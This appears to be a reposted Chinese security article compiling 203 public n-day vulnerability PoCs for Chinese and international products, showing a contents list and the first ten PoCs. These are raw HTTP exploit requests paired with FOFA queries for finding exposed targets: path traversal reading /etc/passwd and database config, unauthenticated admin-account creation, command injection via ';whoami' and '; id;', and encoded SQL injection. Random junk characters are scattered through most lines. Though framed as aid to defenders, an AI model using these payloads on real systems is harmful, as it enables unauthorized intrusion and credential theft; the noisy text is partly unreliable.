互联网公开漏洞整理202309-2024066 H, ^ q0 U3 O8 O
道一安全 2024-06-05 07:41 北京0 I. w8 q. I- G1 S- K; ?
以下文章来源于网络安全新视界 ,作者网络安全新视界
. t$ A- T+ K1 `% y& R8 @( Y+ Z' h/ c5 p( t9 D' P+ Z2 V
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
" j9 m& s. J' E, d$ ]$ t$ p2 y
6 F4 z0 v8 @; H- o7 J漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
. d/ ]- U& p" e$ v# A& G* o0 k/ o& s0 [% t; {& b! A4 F6 X4 c G' i+ @9 c
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。. S# R4 s" }3 f; a4 q1 E
# N0 F% K! e6 o# r* c# ^& [
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。: W7 O- ?* ?9 ]+ {( q4 [( j
; V: }. r' M. B7 |; r7 P合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。0 s4 N5 o0 G* O! _$ s [. L# T
0 t0 [* R2 d! c+ v, K
4 g! L1 H* b) Z
声明2 u b4 E7 D" _- B
3 ^& s Q0 `( \5 S4 E为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
/ b. ^. d* \3 e( [3 ?" Y
( a0 Y1 J" o$ k. o4 M2 U C4 ^有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
. M* [3 S; N' i9 z0 \
3 k) P: F; f& X$ z+ [ h
$ n( P2 W+ g: O" C
+ [- ~8 f7 n! v' g: H目录. h( Q! Z, e% C; [% {6 }
8 r8 ?1 p# D( j5 A, T- s) G5 Z- j% t
01( ^( Z% ~1 _2 y3 g! I
" I+ a' |. U9 |. [1. StarRocks MPP数据库未授权访问
: \( R& d% J+ Y* c/ A2 a( c2. Casdoor系统static任意文件读取
% Y( i7 H! B, i ] z/ j: S# \: ~3. EasyCVR智能边缘网关 userlist 信息泄漏) E- Z- K) ?& i3 C9 s) {% L O' J
4. EasyCVR视频管理平台存在任意用户添加
. i B- [: F+ \4 \4 I& U5. NUUO NVR 视频存储管理设备远程命令执行
9 X$ K! i/ Q2 ]8 `- O; ~9 F: u3 m6. 深信服 NGAF 任意文件读取
; H4 U7 m4 K7 a3 I: ~/ y( P* D+ T7. 鸿运主动安全监控云平台任意文件下载! ~% K* ?& V$ X
8. 斐讯 Phicomm 路由器RCE8 f" j, B4 w0 F( I3 i( m
9. 稻壳CMS keyword 未授权SQL注入
1 N A) S' j: C& x1 d10. 蓝凌EIS智慧协同平台api.aspx任意文件上传* r/ b5 D- j2 y4 P9 ~
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入 F+ h) q% V* g5 c( ]/ X
12. Jorani < 1.0.2 远程命令执行
& m) [# h* {# V' j2 C13. 红帆iOffice ioFileDown任意文件读取
( e a( b! J8 c) C1 C4 [14. 华夏ERP(jshERP)敏感信息泄露
7 K8 @0 P. E& v6 u3 B d15. 华夏ERP getAllList信息泄露
7 Z1 M7 P1 e7 _! \( F16. 红帆HFOffice医微云SQL注入7 n! S5 w" C% n0 @( Q1 w
17. 大华 DSS itcBulletin SQL 注入' t! C1 n! Z8 P+ N0 B
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
6 d. W! }5 a$ y; c Y9 p- ~& q19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
u" @% n/ z: ^20. 大华ICC智能物联综合管理平台任意文件读取$ a3 ~' f9 S9 J! D
21. 大华ICC智能物联综合管理平台random远程代码执行# X" {; ^2 ]+ y1 M/ f8 V
22. 大华ICC智能物联综合管理平台 log4j远程代码执行: p: u: p: m* |+ q
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行. [3 [, L: T1 ]$ H; S- @7 a9 K
24. 用友NC 6.5 accept.jsp任意文件上传/ m2 F; C r( P) V$ E I6 X
25. 用友NC registerServlet JNDI 远程代码执行
6 D4 x! x1 ^/ I+ w$ _; e) |) m) h26. 用友NC linkVoucher SQL注入( M1 Q0 E' F6 }5 ]9 l+ B0 o
27. 用友 NC showcontent SQL注入
0 ^) t8 ]2 E8 d; f28. 用友NC grouptemplet 任意文件上传
8 o; t" K" V! p+ q0 s& d29. 用友NC down/bill SQL注入9 U3 f! |1 N9 D5 F# j1 ^ U+ Q
30. 用友NC importPml SQL注入
: K5 X: a% @9 G5 ~' [7 c& ?+ P. W! `' S31. 用友NC runStateServlet SQL注入
( t2 F9 P' ?: H4 F5 ]( z- j32. 用友NC complainbilldetail SQL注入" g" m3 F* F& C/ C r2 ~
33. 用友NC downTax/download SQL注入
3 F# j3 c( o" x) }34. 用友NC warningDetailInfo接口SQL注入
4 k, v6 P) v2 N, f" t35. 用友NC-Cloud importhttpscer任意文件上传
( D+ [2 M- l9 V9 _' F C1 o }. \+ s36. 用友NC-Cloud soapFormat XXE4 x+ D( ?" k3 a- e% v7 M4 a
37. 用友NC-Cloud IUpdateService XXE$ w5 [, C4 O# ]+ ^% b
38. 用友U8 Cloud smartweb2.RPC.d XXE& Q3 U- P& W2 m+ s
39. 用友U8 Cloud RegisterServlet SQL注入0 L: T3 b& {5 E9 k
40. 用友U8-Cloud XChangeServlet XXE/ S% |' X2 }5 o
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入2 E4 Q; \% l7 T$ J) ]; k
42. 用友GRP-U8 SmartUpload01 文件上传
1 @$ `; w7 o2 D43. 用友GRP-U8 userInfoWeb SQL注入致RCE5 v. b2 U! c7 _0 t% ?
44. 用友GRP-U8 bx_dj_check.jsp SQL注入& V1 v" n8 a, }* `9 E; ~
45. 用友GRP-U8 ufgovbank XXE5 w4 K2 n2 _) m& v& b
46. 用友GRP-U8 sqcxIndex.jsp SQL注入2 V4 c! ]9 c* J! m$ n1 @6 o
47. 用友GRP A++Cloud 政府财务云 任意文件读取+ a. K& T8 [0 x9 m& e
48. 用友U8 CRM swfupload 任意文件上传! H) q1 j1 g( V4 M! H; d9 s- I, ~
49. 用友U8 CRM系统uploadfile.php接口任意文件上传% X% N4 N4 E' J4 L: g. V$ b
50. QDocs Smart School 6.4.1 filterRecords SQL注入
6 R4 s+ U3 R. S/ [5 N+ L- t: `, I; s51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
/ s9 o- @/ _3 \5 E, `52. 泛微E-Office json_common.php sql注入
0 N% D; F% \3 h O8 k53. 迪普 DPTech VPN Service 任意文件上传
* |% }, [& x" W) |6 k& }54. 畅捷通T+ getstorewarehousebystore 远程代码执行+ E& [7 r- U1 R! {
55. 畅捷通T+ getdecallusers信息泄露
8 B6 W0 A3 x3 o( L0 T) [, D& o56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE' t$ u" r8 k2 o1 _0 L" }5 \
57. 畅捷通T+ keyEdit.aspx SQL注入
$ d+ R4 E9 ^" O& [- J" y3 d6 Q58. 畅捷通T+ KeyInfoList.aspx sql注入
, Y" h9 e$ H" Q: w6 h59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
; h+ B K L K f r: Q60. 百卓Smart管理平台 importexport.php SQL注入
9 \- o% n! E. c# K8 O61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
, `, E9 {. T% L$ o, {62. IP-guard WebServer 远程命令执行
9 S' Z: [; n4 g k3 q4 I1 z63. IP-guard WebServer任意文件读取
& t4 N7 C% s1 t( |64. 捷诚管理信息系统CWSFinanceCommon SQL注入) `9 n I H |$ v0 V. _
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
& `5 n, m7 g: @- y3 z8 B66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入1 \, p- [( [; k6 Z( a/ Q( d
67. 万户ezOFFICE wpsservlet任意文件上传
0 s" ?; M6 X0 d6 `) C) Y( ^68. 万户ezOFFICE wf_printnum.jsp SQL注入1 z& E6 i( f& ?# D: Y f
69. 万户 ezOFFICE contract_gd.jsp SQL注入
6 z( @8 g; I# p1 j0 I2 Q: P( T- x$ R70. 万户ezEIP success 命令执行, W+ b& a) m0 t; f* _
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入$ K. G& e) K8 i" E/ n
72. 致远OA getAjaxDataServlet XXE
( V; m& A+ C# m- k& Y6 }% E/ u73. GeoServer wms远程代码执行: k6 i* m% H* ]+ X U; D5 d: r
74. 致远M3-server 6_1sp1 反序列化RCE6 o0 X' e$ y( l1 ?1 \- H
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
7 V* X2 d5 S; G R3 k# L# X76. 新开普掌上校园服务管理平台service.action远程命令执行
, R4 Y1 s$ K v! K77. F22服装管理软件系统UploadHandler.ashx任意文件上传
# `: x2 D/ F6 b0 z3 K78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传# _- B s, H x( L
79. BYTEVALUE 百为流控路由器远程命令执行
0 ~8 H4 o s& s" |5 \9 P80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传2 [' Z$ l2 E+ f( H
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露( O0 y" H# j; o2 ?9 d% |9 J
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行6 a' E- Y0 G* d% S, A
83. JeecgBoot testConnection 远程命令执行
5 C+ E- u5 s/ N3 y84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
0 K5 A# E& Q) I85. SysAid On-premise< 23.3.36远程代码执行8 y% Y7 {+ W7 `& F% y9 Q$ p
86. 日本tosei自助洗衣机RCE
3 e4 u1 c" \; b7 W4 |87. 安恒明御安全网关aaa_local_web_preview文件上传
* b" p* t2 O' u M9 z: y88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行# K# r! e9 v9 M9 Q2 }
89. 致远互联FE协作办公平台editflow_manager存在sql注入, E) f0 B& @# l7 Z* a
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
* ?/ Q8 I# Z' C8 w) f) j91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
3 S5 T# Y9 N- f7 k92. 海康威视运行管理中心session命令执行
$ E$ t8 w6 W/ U* x* N( G1 i9 j$ U93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传1 z Z0 z6 Q% l7 C0 ]+ N3 G
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传- G$ @6 m5 K' ?
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
+ r/ U5 _5 N4 c96. Apache OFBiz 18.12.11 groovy 远程代码执行
/ H8 w9 s7 I# X0 c& { l3 A- W1 i4 o97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
8 ?. n9 \$ y7 }) }/ z98. SpiderFlow爬虫平台远程命令执行3 U" Q$ V: ]& O6 U3 o+ x- r0 D
99. Ncast盈可视高清智能录播系统busiFacade RCE
) _2 H7 B, ^ s+ R100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传( b, y) R$ J- c$ c' M0 x
101. ivanti policy secure-22.6命令注入
: u# k, Y2 H* N4 r; H9 _( r( L1 @; _102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行0 {* y3 c3 }9 R
103. Ivanti Pulse Connect Secure VPN XXE* Q+ @( }. F5 J. O' T: F' j2 W2 u
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
( n0 v" j/ T# B& H4 @; l105. SpringBlade v3.2.0 export-user SQL 注入
& T7 k0 A% |# J3 w; f' O+ M% N! E106. SpringBlade dict-biz/list SQL 注入
- B2 y9 y9 b0 q6 r9 d" s1 K8 X+ o107. SpringBlade tenant/list SQL 注入
3 h8 @. M8 ?" i( g k4 o% o3 c108. D-Tale 3.9.0 SSRF
7 f3 t4 I: ^9 G, `: E0 S2 D) O. r109. Jenkins CLI 任意文件读取
5 a; j2 h% u4 y# b' Z. M) C% O" t110. Goanywhere MFT 未授权创建管理员
3 C& l- D' Y2 r% q9 }; q) x$ E1 p111. WordPress Plugin HTML5 Video Player SQL注入' H2 J0 x- z) r8 P# y
112. WordPress Plugin NotificationX SQL 注入
3 e. R c' H% d9 o( q2 R$ @113. WordPress Automatic 插件任意文件下载和SSRF
5 s; S8 t( D. L5 f- X+ P- V114. WordPress MasterStudy LMS插件 SQL注入7 s6 ?; S/ I; r0 `8 b& [
115. WordPress Bricks Builder <= 1.9.6 RCE
7 \* [) U# X& `; g5 Q+ d/ u* f4 ^116. wordpress js-support-ticket文件上传
: x' n& d5 p( ?2 @5 j1 C2 p117. WordPress LayerSlider插件SQL注入7 [4 c* l+ T$ i0 F9 s
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传! x& G% L. X: m& g4 u
119. 北京百绰智能S20后台sysmanageajax.php sql注入" i0 E Q3 d. C& I* i* H: j4 a
120. 北京百绰智能S40管理平台导入web.php任意文件上传
: m7 K, I$ x* z121. 北京百绰智能S42管理平台userattestation.php任意文件上传/ Y, {2 z/ M- e% K0 H
122. 北京百绰智能s200管理平台/importexport.php sql注入
5 ^+ O# Z" H2 [3 b0 }2 j% k123. Atlassian Confluence 模板注入代码执行9 g" ]* J; G# N; u
124. 湖南建研工程质量检测系统任意文件上传
) Z( d$ c1 N' ?5 n: e125. ConnectWise ScreenConnect身份验证绕过 |0 C- a' _3 V, I" z! D6 q
126. Aiohttp 路径遍历$ B9 c/ v/ g) W) [
127. 广联达Linkworks DataExchange.ashx XXE# `4 E& Y. C0 L3 t# H# w4 J
128. Adobe ColdFusion 反序列化
: @1 p* u' `: H R; v) l( x5 f. \129. Adobe ColdFusion 任意文件读取, ~# w/ M' G+ ~; u
130. Laykefu客服系统任意文件上传1 `9 X* ^1 k. G7 J7 v; |/ X
131. Mini-Tmall <=20231017 SQL注入6 |! G* r% S+ K; M: p! d1 `
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
! j w2 T, Y0 F! V, m" x! J T133. H5 云商城 file.php 文件上传
9 F+ k( k5 `& L134. 网康NS-ASG应用安全网关index.php sql注入
: w; i- a/ e+ N' \' y9 b135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
: ]$ s/ ~9 N1 p5 d7 f7 y: Q- ]4 O) O* i136. NextChat cors SSRF
4 b* S+ h8 P, _7 q0 f# I1 a- F3 n! k# e137. 福建科立迅通信指挥调度平台down_file.php sql注入
/ L) z7 d8 c" {+ ]( q2 q- {138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
+ R1 g% w, r/ j! b3 R/ A9 o( P139. 福建科立讯通信指挥调度平台editemedia.php sql注入' Q0 c9 u, [, K
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入, V2 s& K$ m, E: T$ e& G J9 J$ m0 Q. {
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
4 B' T* z7 T/ D1 T142. CMSV6车辆监控平台系统中存在弱密码
k2 D9 X8 L/ ]- [143. Netis WF2780 v2.1.40144 远程命令执行, f4 {6 }" U' I) G2 y' I
144. D-Link nas_sharing.cgi 命令注入) L1 G, q. L$ m3 j' x- l
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
* {* N* q( n6 ]! a146. MajorDoMo thumb.php 未授权远程代码执行( A* h) f# d7 v& z
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
4 t. a" u4 z/ ?148. CrushFTP 认证绕过模板注入
/ a+ D) c- }* ~: J% D# Q- }149. AJ-Report开源数据大屏存在远程命令执行) T7 f2 f% X, F2 G" f5 D
150. AJ-Report 1.4.0 认证绕过与远程代码执行
2 v# u+ Y$ |2 G( a. w151. AJ-Report 1.4.1 pageList sql注入* U2 S1 K* A: b" H
152. Progress Kemp LoadMaster 远程命令执行2 {, }" c4 B& e$ X2 x5 w* @
153. gradio任意文件读取
& ]7 x+ [8 Y( V: p5 n' Y154. 天维尔消防救援作战调度平台 SQL注入, P0 l s" H' z: w- l
155. 六零导航页 file.php 任意文件上传
2 }: R* L& M& I156. TBK DVR-4104/DVR-4216 操作系统命令注入. J+ x1 R q' M$ U5 d
157. 美特CRM upload.jsp 任意文件上传
: o% E9 g4 F) q6 d6 Y1 J158. Mura-CMS-processAsyncObject存在SQL注入6 c7 ]/ J) J: y) I* W8 o+ B
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传8 d, D! s6 L* b1 @8 s1 z
160. Sonatype Nexus Repository 3目录遍历与文件读取
. E% K6 S: k- |% V N# o161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传6 E9 l. N `$ q4 M6 x e+ [$ g0 t
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
$ N& Z/ H- D; Z163. 号卡极团分销管理系统 ue_serve.php 任意文件上传: f' E5 A4 |+ Z3 h: P$ Q; K
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传- U" L( ]5 i0 S7 g0 y% g
165. OrangeHRM 3.3.3 SQL 注入6 `) \+ d3 ?# S% f+ Y2 u
166. 中成科信票务管理平台SeatMapHandler SQL注入% Z' e4 M8 C9 j' M |
167. 精益价值管理系统 DownLoad.aspx任意文件读取: N/ x( k" ?' K
168. 宏景EHR OutputCode 任意文件读取
7 w5 @5 c5 T: I169. 宏景EHR downlawbase SQL注入" B9 X. o: C8 y. n2 f* @1 J
170. 宏景EHR DisplayExcelCustomReport 任意文件读取% z: C( b) }3 \1 {
171. 通天星CMSV6车载定位监控平台 SQL注入
8 }; o4 D. _1 X+ \, p: I9 e172. DT-高清车牌识别摄像机任意文件读取/ K- i& H' y- n
173. Check Point 安全网关任意文件读取 t& B* C- H& D' i
174. 金和OA C6 FileDownLoad.aspx 任意文件读取; o2 C$ M' Z5 B3 x* i
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
& v. t3 v7 \6 {, ]' |0 ]176. 电信网关配置管理系统 rewrite.php 文件上传
7 b( ^; b. I- W6 k+ t177. H3C路由器敏感信息泄露
/ q, ?+ Q& a% J w* |178. H3C校园网自助服务系统-flexfileupload-任意文件上传
% ^( _3 p! b1 W179. 建文工程管理系统存在任意文件读取8 s$ {9 H1 A" Y5 V
180. 帮管客 CRM jiliyu SQL注入
9 q% [$ |9 H/ ~/ `181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
" R& x. w3 b: U4 p4 A7 W1 V& L182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建. Q7 k, f5 [/ ^* B- o
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
( C3 y) U% c8 a& }184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加 p; Q# O8 m$ W [0 p/ N0 t5 m
185. 瑞友天翼应用虚拟化系统SQL注入3 S$ U/ j- ? @* n- K4 \0 Z2 {
186. F-logic DataCube3 SQL注入- N; _: {5 f ]8 M9 e
187. Mura CMS processAsyncObject SQL注入
2 e5 ^& B, s S/ J7 O! \/ c188. 叁体-佳会视频会议 attachment 任意文件读取6 y/ ?* @, N- {" l/ c8 Y+ _" D
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
. J) I! B5 S0 H190. 短视频矩阵营销系统 poihuoqu 任意文件读取
$ c w1 T9 T5 U7 H, B7 @3 I; i191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入2 P5 N, }( m+ {4 ?% T6 t$ h" Y
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
* {# ? ~7 `$ U; h193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行 Z% x0 S9 R4 R) j
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
+ m z3 N" B! |' T7 u195. 飞鱼星上网行为管理系统 send_order.cgi命令执行; G5 _2 }( _ n" g7 x' X
196. 河南省风速科技统一认证平台密码重置
5 m( _# \- P, `* E197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入 H! x3 H7 N; P2 X% W, D! a
198. 阿里云盘 WebDAV 命令注入2 ~& \' C2 ~# Z
199. cockpit系统assetsmanager_upload接口 文件上传6 g& u* }$ l1 A8 e3 Q0 u
200. SeaCMS海洋影视管理系统dmku SQL注入; ^8 ]0 }/ l0 P$ G, u( x' S- o6 Y
201. 方正全媒体新闻采编系统 binary SQL注入2 M8 x! K( L$ X
202. 微擎系统 AccountEdit任意文件上传4 k$ L. K7 j0 l* p. B/ r
203. 红海云EHR PtFjk 文件上传5 J; b1 [( d. q J# S. U2 {) ?4 W
/ W8 }% |7 q! T' ]
POC列表- f! t! }! c2 d& z5 A! |+ n
7 q6 @3 J* N H$ `2 ?, u' N
025 ^' ?- `" P) j& l' w" \! r; t/ C' Z
4 F2 Y. T6 Y0 `( X1. StarRocks MPP数据库未授权访问
+ [# \0 F) z" R# ^FOFA :title="StarRocks"
5 l2 T( ^8 @8 l) ?/ I" R' {GET /mem_tracker HTTP/1.1
: m! C! J# n$ N* q3 c$ b( t8 X7 DHost: URL$ W @! V; p% H4 Q6 p3 y' u& B
5 c2 _6 l& {) J9 z3 f# Y
0 j- L+ Y8 b6 U( l# e2. Casdoor系统static任意文件读取
/ Z J/ I' s2 z7 F; |! b! ?9 LFOFA :title="Casdoor"3 _6 r9 |1 F8 j Y! n/ v. _
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
' r% \( K. ]6 z! ~1 L* ZHost: xx.xx.xx.xx:9999% V' D) m& `+ V) X( Q! x0 S' Y' }
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.365 b( T' M! c; B: y4 z4 K
Connection: close
( Y0 z5 T, ?+ HAccept: */*
% H- X" @; s$ A$ y4 DAccept-Language: en
6 N3 @' J& E) `# Q: r C1 d' ]Accept-Encoding: gzip( l2 v& ?, _5 l7 b5 t
: g! ?! O2 T1 e% Q) i
) I9 ]) s. t N; m0 {! a# D
3. EasyCVR智能边缘网关 userlist 信息泄漏' S$ l! I9 a! y+ Q( l
FOFA :title="EasyCVR"
2 v% ]# g. D' J" v* ^, ZGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
! r8 S) S5 J% c+ Q+ m$ yHost: xx.xx.xx.xx; Q5 x2 o+ U7 L4 T# g" O- ?
0 Y2 W0 f( ^6 Y. a9 k; o) i/ {8 L$ @
4. EasyCVR视频管理平台存在任意用户添加. d2 J: i D. @9 s* L
FOFA :title="EasyCVR"
% J# n4 W7 Y, {6 j# @6 v! ?* D9 y6 c) A1 L- n6 e
password更改为自己的密码md5 J3 z5 m) |7 _' n4 s7 j7 B
POST /api/v1/adduser HTTP/1.1/ q/ `# Q3 d. ~+ O, k2 p
Host: your-ip
" g9 Q4 |$ n9 `# |& H( [Content-Type: application/x-www-form-urlencoded; charset=UTF-8/ c) R, {( F& Q6 V5 b8 |' a/ u, W
! F b* e& Q1 G" Gname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1! l1 N: V& |9 Z c' f ]. B b
, T2 O/ D* A7 G/ z4 {
: b0 u( T+ E% V, x5. NUUO NVR 视频存储管理设备远程命令执行
4 I" ^, c$ T& ~/ S9 I% dFOFA:title="Network Video Recorder Login"2 [, G# U# R- ^# t; D4 l& I
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
$ F" c7 ]6 r2 P, U, JHost: xx.xx.xx.xx& h9 N4 v* }$ ~# X& P
& w0 y7 D3 S. n" Z$ A" q* Y+ q1 H
5 Z) A- {* x w, w, T( j6. 深信服 NGAF 任意文件读取" E2 p2 a( R( Z
FOFA:title="SANGFOR | NGAF"$ Y) H6 [/ ?, r* @/ h) K# d# x
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.14 W9 Y5 O" w! }
Host:
: O; K2 S- L0 Q Y: F% r! o( t0 u i# v, Q; S
! i0 _% t, n* X( z' u4 H9 E7. 鸿运主动安全监控云平台任意文件下载
, B _9 _# c1 YFOFA:body="./open/webApi.html"
! K" I; N: P4 z8 r8 r/ @. PGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
0 t4 } |! o( r( XHost:
; f3 t4 S# s, ?6 z; m. k* Z
4 k: @1 I7 A4 P9 ~3 ^" ]* k3 i
. t# h: W5 J7 \8. 斐讯 Phicomm 路由器RCE
+ b8 h6 ~( U' L1 Z) bFOFA:icon_hash="-1344736688"
( \3 Q, ]2 N& w! t! f7 V- z- a默认账号admin登录后台后,执行操作3 O+ Y9 ^0 p5 t; N8 `) j
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.14 ~, ^) n/ k! ?# f5 E# z
Host: x.x.x.x' ?, g9 m, m2 q; h# d; d. x+ C% S
Cookie: sysauth=第一步登录获取的cookie
$ c8 M( o4 U/ o( y* e5 g6 p+ U7 KContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz. v/ g" | I- _" E- a$ R9 V% R
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
0 m- Q! }$ j& Q, j; g
3 Z/ t; |+ \& C; B$ Z5 D------WebKitFormBoundaryxbgjoytz
4 z6 i0 \1 N4 _ y kContent-Disposition: form-data; name="wifiRebootEnablestatus"' C9 Q$ Y- `2 X- w* j# l/ q- U% m
, |6 W9 T6 L7 \%s
, a9 F. K8 v4 N' o5 V/ H9 H------WebKitFormBoundaryxbgjoytz: X- i8 ]$ X2 s4 \- J# W
Content-Disposition: form-data; name="wifiRebootrange"
! C* p8 @3 Q7 j% S
2 Z7 Y2 U, D# I12:00; id;; _' q, D1 F" H+ W9 g2 M0 P. L$ k
------WebKitFormBoundaryxbgjoytz
5 \+ w) n5 P' I7 K' UContent-Disposition: form-data; name="wifiRebootendrange"/ I; B/ v5 n! U2 C$ o+ Q/ `+ j! Q
, a' k& k5 }& u& b
%s:
+ ]3 P/ D+ O. W( |! T' z& G------WebKitFormBoundaryxbgjoytz
7 k! k1 ^& i' R7 U3 N1 EContent-Disposition: form-data; name="cururl2"
/ Y9 Y' C, [6 u8 q
6 ]% m1 v6 z$ b- z+ g0 Y& `7 N
9 ~- l$ R' T4 W, w9 A5 ?4 i------WebKitFormBoundaryxbgjoytz--" ?( j4 v- D+ t! Y& \. {" l( q
( i% n& D9 n9 ?
$ u/ {- _" C8 Q' k' n% I Y9. 稻壳CMS keyword 未授权SQL注入9 D1 K3 D0 W; {+ H1 `5 [+ f3 c
FOFA:app="Doccms"! U) B9 i$ k; V! _
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1! p, v* C2 @" u- L. r8 R
Host: x.x.x.x
0 f, ^9 Z' T: p9 b& Q
$ n5 e$ \0 g1 b, c6 x k6 [0 N9 n1 G; |7 D4 n4 l
payload为下列语句的二次Url编码0 g! u" i" R# ` h$ h
) I2 F# n5 V7 ~' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
7 p- W+ }, ]5 S( r! j" y) q1 e+ O% X( h4 B
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
6 q6 k7 U& w5 c, E* y& oFOFA:icon_hash="953405444"" ?( c; d) c+ m1 y+ E9 H, U
' M# }: ~& U, K* k2 T: s, Q
文件上传后响应中包含上传文件的路径
3 m/ I$ P7 N* n. q( T/ I) hPOST /eis/service/api.aspx?action=saveImg HTTP/1.1 a/ @* n. G& s8 ?$ @2 d
Host: x.x.x.x:xx* W/ X$ G% B, o2 H& i3 N& ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
! J- |6 m5 w2 W; TContent-Length: 197) N+ c, V" T- b6 r, ^$ x, N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
) n5 u4 Q, ]4 h$ n9 RAccept-Encoding: gzip, deflate" N, Q( N6 [0 F3 _* d* w# R2 h
Accept-Language: zh-CN,zh;q=0.9
Y/ H, r1 u Y) S" A3 C0 _5 JConnection: close, {% U& R7 ~* G/ _& Z6 v
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu5 V c4 K3 o1 t8 v: f6 T' n
) [7 _: q2 v5 C+ W
------WebKitFormBoundaryxdgaqmqu5 u- q9 k+ N) W) A2 j' ?. z, o- R ^: a, S
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
, b) |' N( r8 s P" T9 }3 CContent-Type: text/html
# @# y$ v+ K8 p# n+ v# N) h* U+ j/ V9 x# Q
jmnqjfdsupxgfidopeixbgsxbf
0 B) M# ~- Z, f5 `------WebKitFormBoundaryxdgaqmqu--
